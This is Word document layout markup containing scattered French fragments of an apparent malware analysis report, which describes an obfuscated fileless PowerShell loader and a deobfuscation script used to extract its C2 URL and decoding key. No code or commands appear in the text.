            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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 script Powershell servant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est lourdement obfusqué : les noms de variables sont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0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7007248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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modifiés dynamiquement (chaque variant a ses propres noms de variables) et les chaînes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1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7180603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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caractères et nombres sont générés à l’exécution, ce qui complique l’analyse statique. Après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2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7353958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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désobfuscation, le script révèle un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 en mémoire (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="-2"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">file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less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) dont le rôle est de charger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3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7547633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2380421" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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04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exécuter la charge utile stockée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4640" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3264535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7545928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1320683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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06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C:\ProgramData\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5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7847353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Ceci a conduit à la création d’un script propriétaire permettant de désobfusquer facilement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6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8020708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Powershell et de récupérer facilement les IOCs qu’il contient (URL du C2 et clé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7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8194063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1829165" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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916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décodage de la charge utile.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873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97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078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180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28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3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03897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8562340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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85623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8562340"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4345939"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434593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  <a:moveTo>
                            <a:pt x="0" y="4618354"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4618354"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8562340"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8562340"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4618354"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4345939"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4345939"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4618990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4618990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4345939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4345939"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434593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102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5335914</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4216400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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2164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216400">
                          <a:moveTo>
                            <a:pt x="0" y="272414"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="272414"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4216400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4216400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="27241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273050"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="27305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20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1266187</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3928110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="431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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-32" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="3928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3928110">
                          <a:moveTo>
                            <a:pt x="0" y="3928110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="3928110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392811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307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5723887</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3686187"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="431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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-34" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="36861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3686187">
                          <a:moveTo>
                            <a:pt x="0" y="3686187"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="368618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368618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409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512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6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3172305" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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23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Voici un exemple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Powershell obfusqué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7168" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2294889</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5180985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3008617" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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861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24 – Extrait du code du loader Powershell obfusqué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8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5418478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2738003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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80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Sa version désobfusquée à l’aide du script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9216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1796415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9396750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4004970" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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497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25 – Extrait du loader Powershell déchiffré à l’aide du script propriétaire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02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126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3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22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3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3312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3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433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3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0574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3117849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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117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117849">
                          <a:moveTo>
                            <a:pt x="0" y="2079624"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2079624"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3117849"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3117849"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2079624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2080259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="208025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04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4222759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="696594"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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6965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696594">
                          <a:moveTo>
                            <a:pt x="4749799" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69659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758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4919989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="4834254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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48342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4834254">
                          <a:moveTo>
                            <a:pt x="4749799" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="105981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7891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3117849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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117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117849">
                          <a:moveTo>
                            <a:pt x="0" y="2079624"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2079624"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3117849"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3117849"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2079624"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="160654"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="160654"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2080259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2080259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1606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1289"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16128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8198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4222759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="696594"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6965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696594">
                          <a:moveTo>
                            <a:pt x="4749799" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69659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9734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4919989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="4834254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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48342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4834254">
                          <a:moveTo>
                            <a:pt x="4749799" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4834254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4834254"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4065269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4834254"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4064634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="4064634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3004819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4064634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3004184"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="3004184"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3004184"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4749799" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="105981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10656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4222759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="5538470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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050" cy="5538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050" h="5538470">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5538470"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5535294"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="5535294"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4765674"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4765674"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3705224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3705224"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2821304"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2821304"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1760855"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1760855"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="700405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="700405"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57340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11680" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2399030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4229109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5525769"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5257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525769">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="552576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13728" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5650230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4222759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="977903" cy="5538470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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7903" cy="5538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7900" h="5538470">
                          <a:moveTo>
                            <a:pt x="977900" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="977900" y="5538470"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="553211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26016" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3916044</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1789439</wp:posOffset>
            </wp:positionV>
